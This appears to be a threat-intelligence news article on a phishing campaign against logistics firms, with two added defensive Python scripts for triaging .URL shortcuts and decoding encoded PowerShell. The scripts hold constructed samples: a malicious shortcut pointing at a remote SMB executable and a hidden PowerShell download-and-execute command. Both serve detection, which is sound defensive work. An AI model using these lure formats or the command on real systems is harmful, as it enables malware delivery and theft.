Transportation and logistics companies in North America are the target of a new phishing campaign that delivers a range of information stealers and remote access trojans (RATs).
The activity cluster, Proofpoint says, abuses compromised legitimate email accounts belonging to transportation and shipping companies to inject malicious content into existing email conversations.
As many as 15 compromised email accounts have been identified as being used in the operation. It is not currently known how these accounts were compromised in the first place or who is behind the attacks.
"Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport," the enterprise security company said in an analysis published Tuesday.
"In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2."
The attack chains involve sending emails carrying internet shortcut (.URL) attachments, or Google Drive links that lead to a .URL file, which, when opened, uses Server Message Block (SMB) to fetch the next-stage payload containing the malware from a remote share.
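The reason a plain-text shortcut can trigger an SMB fetch is that a .URL file is an INI-formatted file whose URL= (and IconFile=) values Windows resolves as paths; if the value is a UNC path or a file:// URL with a host component, the workstation opens an outbound SMB connection (TCP 445) to that host, and Explorer fetches a remote IconFile when it renders the shortcut, before the user even double-clicks it. The triage script below is an added example written for this article, not Proofpoint's tooling; the two .URL samples are constructed, and the 192.0.2.x host is the RFC 5737 documentation range. It flags any shortcut whose target, icon, or working directory is remote, which is the property that distinguishes this lure from a benign web shortcut.

```python
"""Triage Internet Shortcut (.URL) files for remote SMB payload targets.

Added example for the delivery chain described in the article; this is not
Proofpoint's tooling. A .URL file is INI-formatted text. When a user opens it,
Windows resolves the URL= target, and IconFile= is resolved when Explorer
renders the shortcut. If either points at a UNC path or a file:// URL with a
host, the workstation makes an outbound SMB (TCP 445) connection to fetch it.
"""
import configparser
import re
from urllib.parse import urlparse

# Keys whose value Windows resolves as a path; any of them can name a remote share.
REMOTE_KEYS = ("url", "iconfile", "workingdirectory")
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")  # \\host\share\...


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] section as a dict with lowercase keys."""
    parser = configparser.RawConfigParser(strict=False)  # no % interpolation, tolerate duplicate keys
    parser.read_string(text.lstrip("\ufeff"))            # drop a UTF-8 BOM if present
    for section in parser.sections():
        if section.lower() == "internetshortcut":
            return dict(parser.items(section))
    return {}


def remote_host(value: str):
    """Return the host a shortcut value points at, or None for local or web targets."""
    value = value.strip().strip('"')
    match = UNC_RE.match(value)
    if match:
        return match.group(1)                # \\192.0.2.10\share\x
    parsed = urlparse(value)
    if parsed.scheme.lower() != "file":
        return None                          # http(s) targets are not SMB fetches
    if parsed.netloc:
        return parsed.netloc                 # file://host/share/x
    if parsed.path.startswith("//"):
        return parsed.path.split("/")[2]     # file:////host/share/x (four-slash form)
    return None                              # file:///C:/... is a local path


def triage(text: str) -> dict:
    """Flag a .URL file whose target, icon, or working directory lives on a remote host."""
    fields = parse_url_file(text)
    remote = {key: remote_host(fields[key]) for key in REMOTE_KEYS if key in fields}
    remote = {key: host for key, host in remote.items() if host}
    return {"fields": fields, "remote": remote, "suspicious": bool(remote)}


# Constructed samples; 192.0.2.0/24 is the RFC 5737 documentation range.
MALICIOUS_SAMPLE = """[InternetShortcut]
URL=file://192.0.2.10/share/Invoice_2024.pdf.exe
IconFile=\\\\192.0.2.10\\share\\pdf.ico
IconIndex=0
"""

BENIGN_SAMPLE = """[InternetShortcut]
URL=https://example.com/tracking
IconFile=C:\\Windows\\System32\\SHELL32.dll
IconIndex=13
"""

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = triage(sample)
        print(f"{name}: suspicious={result['suspicious']} remote={result['remote']}")
```

In practice this check belongs in the mail gateway's attachment pipeline (including .URL files inside archives and files fetched from the Google Drive links the campaign uses), and it pairs with a network control: user workstations have no business making SMB connections to the internet, so blocking or alerting on outbound TCP 445 neutralizes this delivery step regardless of how the shortcut arrived.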
Some variants of the campaign identified in August 2024 have also adopted a newly popular technique dubbed ClickFix to trick users into installing the DanaBot malware under the pretext of fixing a problem with displaying document content in the web browser.
Specifically, this involves urging users to copy and paste a Base64-encoded PowerShell script into a terminal, thereby kicking off the infection process.
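Because the victim types the command themselves, there is no dropper on disk to scan; what the defender has is the process-creation record (Sysmon Event ID 1, or Security Event 4688 with command-line auditing enabled) of a powershell.exe launch whose payload is Base64 of a UTF-16LE script. Keyword rules that only inspect the raw command line never see the cleartext. Where PowerShell Script Block Logging (Event ID 4104) is enabled the decoded script is logged directly; the decoder below is an added example written for this article, not Proofpoint's detection content, for telemetry that lacks it. The sample command line is constructed inside the script (the Base64 is generated, not hand-typed), the 192.0.2.x URL is the documentation range, and the indicator list is an assumption to be tuned per environment.

```python
"""Decode PowerShell -EncodedCommand launches from process command lines.

Added example for the ClickFix step described in the article; not Proofpoint's
detection content. Process-creation telemetry (Sysmon Event ID 1, or Security
4688 with command-line auditing) records the line the victim pasted, but
-EncodedCommand carries Base64 of the UTF-16LE script, so rules that only
inspect the raw line miss the cleartext.
"""
import base64

# Heuristic indicators (assumption: tune to your environment). Matched against
# the lowercased raw command line plus the decoded script.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "invoke-webrequest",
              "frombase64string", "-w hidden", "bypass")


def extract_encoded_command(cmdline: str):
    """Return the cleartext of a -EncodedCommand argument, or None if absent or invalid.

    powershell.exe accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...),
    so match prefixes of "encodedcommand" rather than the full name.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        flag = tok.lstrip("-/").lower()
        if not flag.startswith("e") or not "encodedcommand".startswith(flag):
            continue                         # -ep (ExecutionPolicy), -exec, etc. are not it
        blob = tokens[i + 1].strip("'\"")
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except ValueError:                   # binascii.Error and UnicodeDecodeError derive from it
            return None                      # not valid Base64/UTF-16LE; leave for manual review
    return None


def triage_command_line(cmdline: str) -> dict:
    """Decode any encoded payload and report indicator hits across raw and decoded text."""
    script = extract_encoded_command(cmdline)
    haystack = (cmdline + " " + (script or "")).lower()
    hits = sorted(ind for ind in INDICATORS if ind in haystack)
    return {"encoded": script is not None, "decoded": script, "indicators": hits}


# Constructed sample. The Base64 is generated here rather than hand-typed; the URL
# uses the RFC 5737 documentation range and does not resolve to anything real.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.20/fix.ps1')"


def build_sample_command_line(script: str) -> str:
    """Build a ClickFix-style launch line: hidden window, policy bypass, encoded body."""
    blob = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -Ep Bypass -Enc {blob}"


if __name__ == "__main__":
    line = build_sample_command_line(SAMPLE_SCRIPT)
    print(line)
    print(triage_command_line(line))
```

The point of decoding before matching is that the same SIEM rule then catches the encoded and unencoded forms of the lure, and the `-W Hidden` / `-Ep Bypass` switches on the raw line remain a useful signal on their own: a user who was "fixing a document display problem" has no reason to launch a hidden PowerShell window.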
"These campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management," Proofpoint said.
"The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company's operations before sending campaigns."
The disclosure comes amid the emergence of various stealer malware strains such as Angry Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed Yet Another Silly Stealer (YASS).
It also follows the discovery of a new version of the RomCom RAT, a successor to PEAPOD (aka RomCom 4.0) dubbed SnipBot, that is distributed via bogus links embedded in phishing emails. Some components of the campaign were previously documented by the Computer Emergency Response Team of Ukraine (CERT-UA) in July 2024.
"SnipBot gives the attacker the ability to execute commands and download additional modules onto a victim's system," Palo Alto Networks Unit 42 researchers Yaron Samuel and Dominik Reichel said.
"The initial payload is always either an executable downloader masked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable."
While systems infected with RomCom have also seen ransomware deployments in the past, the cybersecurity company noted the absence of this behavior, raising the possibility that the threat actor behind the malware, Tropical Scorpius (aka Void Rabisu), has shifted from pure financial gain to espionage.